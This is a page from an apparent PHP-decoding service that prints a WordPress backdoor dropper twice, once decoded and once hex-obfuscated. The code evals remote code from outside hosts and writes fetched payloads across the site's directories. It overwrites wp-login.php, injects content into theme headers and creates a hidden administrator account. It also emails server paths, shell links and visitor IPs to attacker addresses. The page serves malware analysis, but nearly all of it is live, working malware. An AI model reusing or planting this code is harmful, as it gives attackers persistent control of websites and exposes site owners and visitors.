Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oy..

Decoded Output download

<?   goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oye; phyJP: mail($kime, $baslik, $EL_MuHaMMeD); goto gmDIS; y2Fym: $wp_makale = $document_root . "/phpinfo.php"; goto AoWjh; jsjv0: $from_shellcode = "whm@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto zc2lp; ENKbd: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\xd\xa"; goto phyJP; UJxEc: eval("?>" . file_get_contents("https://googleseo.me/txt/lin.txt")); goto e6rfO; y8M98: $document_root_file = dirname(__FILE__); goto eIQWA; eIQWA: $wp_detect = 0; goto u1kZB; qFaE3: function http_get($url) { $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } goto rHUDi; oc2L4: $wp_code = $document_root . "/wp-clon.php"; goto eS6EZ; wtKF7: fwrite($open_makale, $makale); goto AWC_2; gmDIS: $document_root = $_SERVER["DOCUMENT_ROOT"]; goto y8M98; rv7n8: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "\xd\xa"; goto HprGq; cGrPx: $directories = expandDirectories($document_root); goto QPADE; Ktwys: function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } goto r_VOh; RH2sH: function expandDirectories($base_dir) { $directories = array(); foreach (scandir($base_dir) as $file) { if ($file == "." || $file == "..") { continue; } $dir = $base_dir . DIRECTORY_SEPARATOR . $file; if (is_dir($dir)) { $directories[] = $dir; $directories = array_merge($directories, expandDirectories($dir)); } } return $directories; } goto qFaE3; Ppwme: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd\xa"; goto bR43V; RODvO: @mail($to_email, $server_mail, $linkcr, $header); goto FK5W9; tmUpw: $code = http_get("https://acbdf.space/txt/min.txt"); goto oc2L4; ARCkU: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . "  - " . $_SERVER["HTTP_HOST"] . ''; goto pgjdp; vZ2fV: $datasi = @fopen("js/js.php", "r"); goto K0oF9; s9tWU: fwrite($open_code, $code); goto G4eMt; e6rfO: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto vZ2fV; Be8Vg: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto UJxEc; zc2lp: $to_email = "[email protected]"; goto ARCkU; eS6EZ: $open_code = fopen($wp_code, "w"); goto s9tWU; QPADE: $css = http_get("https://acbdf.space/txt/wp.txt"); goto ey7pT; u1kZB: if (file_exists($document_root . "/wp-load.php")) { include $document_root . "/wp-load.php"; $wp_detect = 1; } else { $prefix = count(@explode("/", $document_root_file)); $a = ''; for ($i = 0; $i < $prefix; $i++) { $a = $a . "../"; if (file_exists($document_root_file . "/" . $a . "wp-load.php")) { include $document_root_file . "/" . $a . "wp-load.php"; $wp_detect = 1; break; } } } goto msYYJ; r_VOh: $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto Be8Vg; ey7pT: foreach ($directories as $dir) { if (!preg_match("#wp-content#", $dir)) { $css_file = $dir . "/wp-inda.php"; $open_css = fopen($css_file, "w"); fwrite($open_css, $css); fclose($open_css); } } goto RH2sH; IMpIc: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto jsjv0; pgjdp: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto dplgf; FK5W9: $kime = "[email protected]"; goto VI0x1; msYYJ: if ($wp_detect == 1) { $wp_theme_dir = get_template_directory(); $header_file = $wp_theme_dir . "/headers.php"; $header_content = file_get_contents($header_file); $append = http_get("https://googleseo.me/txt/lin.txt"); if (!preg_match("#" . $append . "#", $header_content)) { $new_content = $append . $header_content; $open_file = fopen($header_file, "w"); fwrite($open_file, $new_content); fclose($open_file); } $user = "webmaster"; $pass = "$P$BxJON2B3r"; $email = "[email protected]"; if (!username_exists($user) && !email_exists($email)) { $user_id = wp_create_user($user, $pass, $email); $user = new WP_User($user_id); $user->set_role("administrator"); } $wp_login = ABSPATH . "/wp-login.php"; $login = http_get("https://acbdf.space/txt/seo.txt"); $open_login = fopen($wp_login, "w"); fwrite($open_login, $login); fclose($open_login); } goto tmUpw; K0oF9: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/css.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;\xa charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto nifji; VI0x1: $baslik = "whm 20203"; goto rv7n8; HprGq: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd\xa"; goto Ppwme; L7Oye: $makale = http_get("https://acbdf.space/txt/phpinfo.txt"); goto y2Fym; dplgf: $header = "From: {$from_shellcode}\xd
Reply-to: {$from_shellcode}"; goto RODvO; bR43V: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd\xa"; goto ENKbd; nifji: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto IMpIc; AoWjh: $open_makale = fopen($wp_makale, "w"); goto wtKF7; rHUDi:  ?>

Did this file decode correctly?

Original Code

 goto Ktwys; AWC_2: fclose($open_makale); goto cGrPx; G4eMt: fclose($open_code); goto L7Oye; phyJP: mail($kime, $baslik, $EL_MuHaMMeD); goto gmDIS; y2Fym: $wp_makale = $document_root . "\x2f\160\x68\160\x69\x6e\146\157\56\x70\150\160"; goto AoWjh; jsjv0: $from_shellcode = "\x77\x68\155\100" . gethostbyname($_SERVER["\x53\105\122\x56\105\x52\137\116\101\x4d\105"]) . ''; goto zc2lp; ENKbd: $EL_MuHaMMeD .= "\101\x76\154\x61\x6e\x61\x6e\x20\x53\x69\x74\x65\40\72\40" . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\124"] . "\xd\xa"; goto phyJP; UJxEc: eval("\x3f\76" . file_get_contents("\150\x74\x74\160\x73\72\x2f\57\147\x6f\157\147\x6c\x65\163\145\157\x2e\155\x65\x2f\x74\170\x74\57\x6c\151\x6e\56\164\170\x74")); goto e6rfO; y8M98: $document_root_file = dirname(__FILE__); goto eIQWA; eIQWA: $wp_detect = 0; goto u1kZB; qFaE3: function http_get($url) { $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } goto rHUDi; oc2L4: $wp_code = $document_root . "\x2f\x77\160\x2d\143\x6c\x6f\x6e\56\160\x68\x70"; goto eS6EZ; wtKF7: fwrite($open_makale, $makale); goto AWC_2; gmDIS: $document_root = $_SERVER["\104\x4f\x43\x55\115\105\x4e\124\137\x52\117\x4f\124"]; goto y8M98; rv7n8: $EL_MuHaMMeD = "\104\157\163\x79\141\x20\x59\x6f\154\165\40\x3a\x20" . $_SERVER["\104\x4f\x43\x55\x4d\105\116\x54\137\x52\117\117\124"] . "\xd\xa"; goto HprGq; cGrPx: $directories = expandDirectories($document_root); goto QPADE; Ktwys: function GetIP() { if (getenv("\110\x54\124\x50\x5f\x43\x4c\x49\105\116\x54\x5f\x49\120")) { $ip = getenv("\110\x54\124\120\137\103\x4c\x49\105\x4e\x54\137\111\x50"); } elseif (getenv("\110\x54\124\x50\x5f\x58\x5f\x46\x4f\x52\127\x41\122\x44\x45\x44\137\106\x4f\x52")) { $ip = getenv("\110\124\124\120\x5f\x58\x5f\x46\x4f\x52\x57\x41\122\x44\105\x44\137\106\117\122"); if (strstr($ip, "\x2c")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\115\x4f\124\105\x5f\101\x44\104\x52"); } return $ip; } goto r_VOh; RH2sH: function expandDirectories($base_dir) { $directories = array(); foreach (scandir($base_dir) as $file) { if ($file == "\x2e" || $file == "\x2e\56") { continue; } $dir = $base_dir . DIRECTORY_SEPARATOR . $file; if (is_dir($dir)) { $directories[] = $dir; $directories = array_merge($directories, expandDirectories($dir)); } } return $directories; } goto qFaE3; Ppwme: $EL_MuHaMMeD .= "\x53\x65\162\166\145\162\x20\x69\x73\154\145\x74\x69\x6d\40\x73\151\x73\x74\145\x6d\x69\x20\x3a\x20" . $_SERVER["\123\105\122\x56\x45\122\137\x53\117\x46\x54\127\x41\122\x45"] . "\xd\xa"; goto bR43V; RODvO: @mail($to_email, $server_mail, $linkcr, $header); goto FK5W9; tmUpw: $code = http_get("\x68\164\164\160\x73\x3a\57\57\x61\x63\142\144\x66\x2e\163\x70\141\143\x65\x2f\164\170\164\57\155\151\x6e\x2e\x74\x78\164"); goto oc2L4; ARCkU: $server_mail = '' . gethostbyname($_SERVER["\123\105\122\126\105\x52\137\x4e\101\x4d\x45"]) . "\x20\x20\x2d\x20" . $_SERVER["\110\x54\124\120\137\110\x4f\123\x54"] . ''; goto pgjdp; vZ2fV: $datasi = @fopen("\152\163\57\152\x73\56\x70\150\x70", "\162"); goto K0oF9; s9tWU: fwrite($open_code, $code); goto G4eMt; e6rfO: if ($_POST["\x71\x75\145\x72\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\165\x65\x72\x79"])); $data = "\x64\141\x74\x61\x2e\x74\x78\x74"; @touch("\144\x61\164\x61\x2e\164\x78\x74"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\x61\x74\x61\56\x74\x78\x74", "\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto vZ2fV; Be8Vg: if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\151\154\x65\137\x67\145\164\137\x63\x6f\x6e\164\145\x6e\x74\x73")) { @($gitt = file_get_contents($x)); } goto UJxEc; zc2lp: $to_email = "\x6c\x6f\147\151\156\x6f\154\x64\165\155\x40\x67\x6d\x61\x69\154\x2e\x63\x6f\155"; goto ARCkU; eS6EZ: $open_code = fopen($wp_code, "\167"); goto s9tWU; QPADE: $css = http_get("\150\x74\x74\160\x73\x3a\x2f\x2f\x61\x63\142\x64\x66\x2e\x73\x70\x61\x63\145\57\164\170\x74\x2f\167\160\x2e\164\170\164"); goto ey7pT; u1kZB: if (file_exists($document_root . "\57\167\160\55\x6c\157\x61\x64\56\x70\x68\160")) { include $document_root . "\x2f\x77\160\x2d\x6c\x6f\141\144\56\x70\x68\x70"; $wp_detect = 1; } else { $prefix = count(@explode("\x2f", $document_root_file)); $a = ''; for ($i = 0; $i < $prefix; $i++) { $a = $a . "\x2e\x2e\x2f"; if (file_exists($document_root_file . "\57" . $a . "\167\x70\x2d\x6c\x6f\141\x64\x2e\x70\x68\160")) { include $document_root_file . "\x2f" . $a . "\167\160\x2d\x6c\x6f\x61\x64\x2e\160\x68\x70"; $wp_detect = 1; break; } } } goto msYYJ; r_VOh: $x = base64_decode("\141\110\122\x30\x63\110\x4d\x36\114\171\71\x68\142\155\71\165\x65\127\x30\167\144\130\115\165\x59\x32\x78\61\131\x69\71\x73\114\x51\75\75") . GetIP() . "\x2d" . base64_encode("\150\164\164\x70\72\57\x2f" . $_SERVER["\110\x54\x54\120\137\110\x4f\x53\124"] . $_SERVER["\x52\x45\121\x55\105\123\124\137\125\122\x49"]); goto Be8Vg; ey7pT: foreach ($directories as $dir) { if (!preg_match("\x23\x77\160\x2d\x63\157\x6e\164\x65\156\164\43", $dir)) { $css_file = $dir . "\x2f\x77\160\55\151\x6e\144\x61\x2e\160\x68\160"; $open_css = fopen($css_file, "\167"); fwrite($open_css, $css); fclose($open_css); } } goto RH2sH; IMpIc: $ip_remote = $_SERVER["\x52\105\x4d\x4f\x54\105\137\101\104\x44\x52"]; goto jsjv0; pgjdp: $linkcr = "\114\151\x6e\x6b\x3a\x20" . $_SERVER["\123\105\122\x56\x45\x52\137\x4e\x41\115\x45"] . '' . $_SERVER["\122\x45\121\125\105\x53\x54\137\x55\122\x49"] . "\40\55\40\111\x50\40\x45\170\x63\165\x74\151\156\147\x3a\40{$ip_remote}\x20\55\40\x54\151\155\x65\x3a\x20{$time_shell}"; goto dplgf; FK5W9: $kime = "\142\171\x68\x65\x72\x6f\64\64\100\x67\x6d\x61\x69\x6c\x2e\x63\x6f\155"; goto VI0x1; msYYJ: if ($wp_detect == 1) { $wp_theme_dir = get_template_directory(); $header_file = $wp_theme_dir . "\57\x68\x65\141\x64\x65\162\163\56\x70\x68\160"; $header_content = file_get_contents($header_file); $append = http_get("\150\x74\164\160\x73\x3a\57\57\147\157\157\147\x6c\145\x73\145\157\x2e\155\x65\57\x74\x78\164\x2f\154\x69\156\x2e\x74\x78\x74"); if (!preg_match("\43" . $append . "\43", $header_content)) { $new_content = $append . $header_content; $open_file = fopen($header_file, "\167"); fwrite($open_file, $new_content); fclose($open_file); } $user = "\167\145\142\x6d\141\163\164\145\x72"; $pass = "\x24\120\44\102\170\x4a\117\x4e\62\x42\63\x72"; $email = "\x62\x79\x68\145\x72\x6f\x34\64\100\147\155\x61\x69\154\56\143\157\155"; if (!username_exists($user) && !email_exists($email)) { $user_id = wp_create_user($user, $pass, $email); $user = new WP_User($user_id); $user->set_role("\141\x64\155\x69\x6e\151\163\164\162\x61\x74\157\x72"); } $wp_login = ABSPATH . "\57\x77\160\55\x6c\x6f\147\151\x6e\x2e\x70\150\160"; $login = http_get("\150\x74\x74\160\163\72\x2f\57\141\143\x62\x64\x66\x2e\x73\x70\141\143\x65\x2f\x74\x78\164\57\163\x65\157\56\164\x78\164"); $open_login = fopen($wp_login, "\167"); fwrite($open_login, $login); fclose($open_login); } goto tmUpw; K0oF9: if ($datasi) { } else { @mkdir("\152\x73"); $dos = file_get_contents("\x68\164\164\x70\x73\x3a\57\x2f\x61\143\x62\x64\146\x2e\x73\x70\x61\143\x65\57\x74\x78\x74\x2f\x63\163\x73\56\164\x78\x74"); $data = "\152\163\57\x6a\163\56\160\150\160"; @touch("\152\163\57\x6a\x73\56\160\x68\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\150\164\164\x70\x3a\x2f\x2f" . $_SERVER["\x48\124\124\x50\x5f\x48\117\123\x54"] . '' . $_SERVER["\x52\x45\121\125\x45\x53\124\x5f\x55\122\x49"] . ''; $y = "\74\150\61\x3e\x53\x65\x6e\x64\145\162\x20\131\x61\x7a\144\151\162\x69\x6c\x64\x69\x2e\x3c\x62\162\57\76\40\x53\111\124\x45\40\x59\117\x4c\40\x3a\x20" . $yol . "\74\142\162\57\x3e\x53\145\156\144\145\x72\40\x59\157\x6c\x75\x20\x3a\40\152\x73\x2f\x63\x72\x73\56\160\150\x70\74\57\x68\61\x3e"; $header .= "\106\162\157\155\72\x20\x53\x68\x65\114\114\40\x42\x6f\x6f\x74\40\x3c\163\x75\160\160\157\162\x40\x6e\151\x63\56\x6f\x72\147\76\xa"; $header .= "\103\x6f\x6e\164\145\x6e\164\55\124\x79\x70\x65\72\x20\x74\145\x78\x74\57\150\x74\155\x6c\73\xa\x20\x63\x68\x61\x72\x73\145\x74\75\x75\164\146\x2d\x38\xa"; @mail("\142\171\150\x65\x72\x6f\64\64\x40\x67\155\x61\x69\x6c\56\143\x6f\x6d", "\110\141\x63\x6b\x6c\151\x6e\x6b\x20\102\x69\x6c\x64\x69\162\151", "{$y}", $header); @mail("\x6c\x6f\x67\x69\156\157\x6c\144\165\155\x40\147\155\141\x69\154\x2e\x63\x6f\x6d", "\110\141\143\153\154\x69\156\153\x20\x42\151\154\144\x69\162\151", "{$y}", $header); } goto nifji; VI0x1: $baslik = "\x77\150\x6d\40\x32\x30\62\60\x33"; goto rv7n8; HprGq: $EL_MuHaMMeD .= "\x53\x65\x72\166\145\162\40\101\144\x6d\x69\156\x20\x3a\x20" . $_SERVER["\123\105\122\x56\105\122\137\101\104\x4d\111\x4e"] . "\xd\xa"; goto Ppwme; L7Oye: $makale = http_get("\150\x74\164\160\163\x3a\x2f\x2f\x61\x63\142\x64\x66\56\x73\x70\141\143\x65\57\x74\x78\x74\57\160\x68\160\x69\x6e\146\157\x2e\164\170\164"); goto y2Fym; dplgf: $header = "\106\162\157\155\x3a\40{$from_shellcode}\xd\12\x52\x65\160\154\x79\55\x74\x6f\72\40{$from_shellcode}"; goto RODvO; bR43V: $EL_MuHaMMeD .= "\123\x68\145\x6c\x6c\x20\114\x69\x6e\x6b\x20\x3a\40\150\x74\x74\160\x3a\57\x2f" . $_SERVER["\x53\105\x52\x56\x45\122\137\x4e\101\115\x45"] . $_SERVER["\120\x48\x50\x5f\x53\105\x4c\106"] . "\xd\xa"; goto ENKbd; nifji: $time_shell = '' . date("\144\x2f\x6d\x2f\131\x20\55\40\x48\72\151\72\163") . ''; goto IMpIc; AoWjh: $open_makale = fopen($wp_makale, "\x77"); goto wtKF7; rHUDi: 

Function Calls

None

Variables

None

Stats

MD5 8a9a9fe1c2e064f6260d1dac0196b58e
Eval Count 0
Decode Time 62 ms